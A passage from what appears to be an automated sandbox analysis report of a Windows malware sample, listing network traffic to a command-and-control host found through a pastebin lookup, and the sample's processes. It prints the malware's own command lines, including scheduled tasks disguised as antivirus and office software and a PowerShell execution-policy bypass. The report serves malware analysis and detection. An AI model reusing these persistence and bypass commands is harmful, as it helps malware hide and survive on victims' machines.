                            Jul 3, 2024 15:54:02.847150087 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:02.847301006 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:03.205872059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.002069950 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.360063076 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.360260010 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.669423103 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.721489906 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.945609093 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:10.945755959 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:10.946640968 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:11.040462971 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:11.040616989 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:11.298635006 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:11.298856020 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:11.658773899 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:15.830276966 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.191992998 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.192148924 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.508794069 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.563960075 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.626571894 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.817370892 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.817523003 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.817816019 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.875910044 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.876013994 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:16.987875938 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:16.988061905 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.177196026 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.177341938 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.297198057 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.345068932 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.531409025 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.563456059 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.563615084 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.563930035 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.653693914 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.653886080 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:17.921947956 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:17.922183037 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:18.279953957 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:28.077208996 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:28.429394007 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:28.429585934 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:28.737472057 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:28.780122995 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.052655935 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:29.052851915 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.053105116 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.087910891 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:29.088134050 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.409079075 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:29.409208059 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:29.767734051 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:30.357996941 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:30.721955061 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:30.722201109 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.031090975 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.076391935 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.297688961 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.297904015 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.298178911 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.384624004 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.384836912 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:31.656196117 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:31.656387091 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:32.015408039 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:40.324542046 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:40.683259964 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:40.683465958 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:40.991476059 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:40.991935015 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:41.354409933 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:41.354602098 CEST4973544998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:41.702816963 CEST4499849735147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:44.089241028 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:44.446455002 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:44.446670055 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:44.755544901 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:44.756104946 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:45.019094944 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:45.019248962 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:45.108941078 CEST4499849743147.185.221.18192.168.11.20
                            Jul 3, 2024 15:54:45.109172106 CEST4974344998192.168.11.20147.185.221.18
                            Jul 3, 2024 15:54:45.464709044 CEST4499849743147.185.221.18192.168.11.20

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 3, 2024 15:50:09.548383951 CEST4942553192.168.11.201.1.1.1
                            Jul 3, 2024 15:50:09.668570042 CEST53494251.1.1.1192.168.11.20
                            Jul 3, 2024 15:50:10.230655909 CEST6205053192.168.11.201.1.1.1
                            Jul 3, 2024 15:50:10.406136036 CEST53620501.1.1.1192.168.11.20
                            Jul 3, 2024 15:50:15.912108898 CEST5891753192.168.11.201.1.1.1
                            Jul 3, 2024 15:50:16.032835960 CEST53589171.1.1.1192.168.11.20
                            Jul 3, 2024 15:50:34.232708931 CEST5241953192.168.11.201.1.1.1
                            Jul 3, 2024 15:50:34.351747990 CEST53524191.1.1.1192.168.11.20

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 3, 2024 15:50:09.548383951 CEST192.168.11.201.1.1.10xcda9Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:10.230655909 CEST192.168.11.201.1.1.10x7651Standard query (0)q-policies.gl.at.ply.ggA (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:15.912108898 CEST192.168.11.201.1.1.10xf09aStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:34.232708931 CEST192.168.11.201.1.1.10xc4fStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 3, 2024 15:50:09.668570042 CEST1.1.1.1192.168.11.200xcda9No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:09.668570042 CEST1.1.1.1192.168.11.200xcda9No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:09.668570042 CEST1.1.1.1192.168.11.200xcda9No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:10.406136036 CEST1.1.1.1192.168.11.200x7651No error (0)q-policies.gl.at.ply.gg147.185.221.18A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:16.032835960 CEST1.1.1.1192.168.11.200xf09aNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:16.032835960 CEST1.1.1.1192.168.11.200xf09aNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:34.351747990 CEST1.1.1.1192.168.11.200xc4fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:34.351747990 CEST1.1.1.1192.168.11.200xc4fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                            Jul 3, 2024 15:50:34.351747990 CEST1.1.1.1192.168.11.200xc4fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • pastebin.com
                            • icanhazip.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.11.2049739104.16.185.241808868C:\Users\user\Desktop\ptKNiAaGus.exe
                            TimestampBytes transferredDirectionData
                            Jul 3, 2024 15:50:16.154191017 CEST63OUTGET / HTTP/1.1
                            Host: icanhazip.com
                            Connection: Keep-Alive
                            Jul 3, 2024 15:50:16.288372040 CEST535INHTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:16 GMT
                            Content-Type: text/plain
                            Content-Length: 13
                            Connection: keep-alive
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET
                            Set-Cookie: __cf_bm=Nv2wOQQkFxllt.30NSNtKjyjCWnsqWSAo0wm45NMMRY-1720014616-1.0.1.1-Ch.Mxn9q0CDfbk0CVRoNHcd9vEiS.v7N5z8wwLH6XZNbXKXmixqfaaVl_8Mn1Gzu5kbucCdFc9dK8mtLd5mf.w; path=/; expires=Wed, 03-Jul-24 14:20:16 GMT; domain=.icanhazip.com; HttpOnly
                            Server: cloudflare
                            CF-RAY: 89d757f75cae122d-ORD
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39 0a
                            Data Ascii: 81.181.62.99


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.11.2049744104.16.185.2418010036C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            TimestampBytes transferredDirectionData
                            Jul 3, 2024 15:50:35.752938032 CEST63OUTGET / HTTP/1.1
                            Host: icanhazip.com
                            Connection: Keep-Alive
                            Jul 3, 2024 15:50:35.878719091 CEST535INHTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:35 GMT
                            Content-Type: text/plain
                            Content-Length: 13
                            Connection: keep-alive
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET
                            Set-Cookie: __cf_bm=.YLP8f6.zktCvrVcOVtz8RhgWrDxRR38LHUQz7_l.9c-1720014635-1.0.1.1-TO0akXd7NjmJzTMC88iDH9.qcO.A1eNiGCSG7QBYSllMSfb9K7xzSD7hFkrulGsS8AcLQj6MAJUJb16eeRH7lA; path=/; expires=Wed, 03-Jul-24 14:20:35 GMT; domain=.icanhazip.com; HttpOnly
                            Server: cloudflare
                            CF-RAY: 89d75871db536216-ORD
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39 0a
                            Data Ascii: 81.181.62.99


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.11.2049734104.20.3.2354438868C:\Users\user\Desktop\ptKNiAaGus.exe
                            TimestampBytes transferredDirectionData
                            2024-07-03 13:50:09 UTC74OUTGET /raw/LmbvnzZM HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-07-03 13:50:10 UTC397INHTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:10 GMT
                            Content-Type: text/plain; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-frame-options: DENY
                            x-content-type-options: nosniff
                            x-xss-protection: 1;mode=block
                            cache-control: public, max-age=1801
                            CF-Cache-Status: HIT
                            Age: 596
                            Last-Modified: Wed, 03 Jul 2024 13:40:14 GMT
                            Server: cloudflare
                            CF-RAY: 89d757d17d942aa2-ORD
                            2024-07-03 13:50:10 UTC35INData Raw: 31 64 0d 0a 71 2d 70 6f 6c 69 63 69 65 73 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 34 34 39 39 38 0d 0a
                            Data Ascii: 1dq-policies.gl.at.ply.gg:44998
                            2024-07-03 13:50:10 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.11.2049742104.20.3.23544310036C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            TimestampBytes transferredDirectionData
                            2024-07-03 13:50:34 UTC74OUTGET /raw/LmbvnzZM HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-07-03 13:50:34 UTC397INHTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 13:50:34 GMT
                            Content-Type: text/plain; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-frame-options: DENY
                            x-content-type-options: nosniff
                            x-xss-protection: 1;mode=block
                            cache-control: public, max-age=1801
                            CF-Cache-Status: HIT
                            Age: 620
                            Last-Modified: Wed, 03 Jul 2024 13:40:14 GMT
                            Server: cloudflare
                            CF-RAY: 89d7586bac5a2bd0-ORD
                            2024-07-03 13:50:34 UTC35INData Raw: 31 64 0d 0a 71 2d 70 6f 6c 69 63 69 65 73 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 34 34 39 39 38 0d 0a
                            Data Ascii: 1dq-policies.gl.at.ply.gg:44998
                            2024-07-03 13:50:34 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:09:50:05
                            Start date:03/07/2024
                            Path:C:\Users\user\Desktop\ptKNiAaGus.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\ptKNiAaGus.exe"
                            Imagebase:0x760000
                            File size:460'288 bytes
                            MD5 hash:4410AF8BEC1266D76029F9BB042C6A73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:2
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff737160000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:3
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:09:50:07
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:8
                            Start time:09:50:29
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:09:50:29
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:11
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:14
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:15
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
                            Imagebase:0x7ff6d2ed0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:09:50:31
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
                            Imagebase:0xf50000
                            File size:751'240'704 bytes
                            MD5 hash:A4A43E58C3E256B89E9074B3485947F4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:09:50:30
                            Start date:03/07/2024
                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"
                            Imagebase:0x7d0000
                            File size:439'296 bytes
                            MD5 hash:D843D2F7E8D6DD8B1490C0EABA86F5CC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:20
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:09:50:32
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:09:50:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:09:50:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:09:50:33
                            Start date:03/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
                            Imagebase:0x7ff7bc220000
                            File size:235'008 bytes
                            MD5 hash:796B784E98008854C27F4B18D287BA30
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:09:50:34
                            Start date:03/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit
                            Imagebase:0x7ff62f810000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:09:50:35
                            Start date:03/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff65ad10000
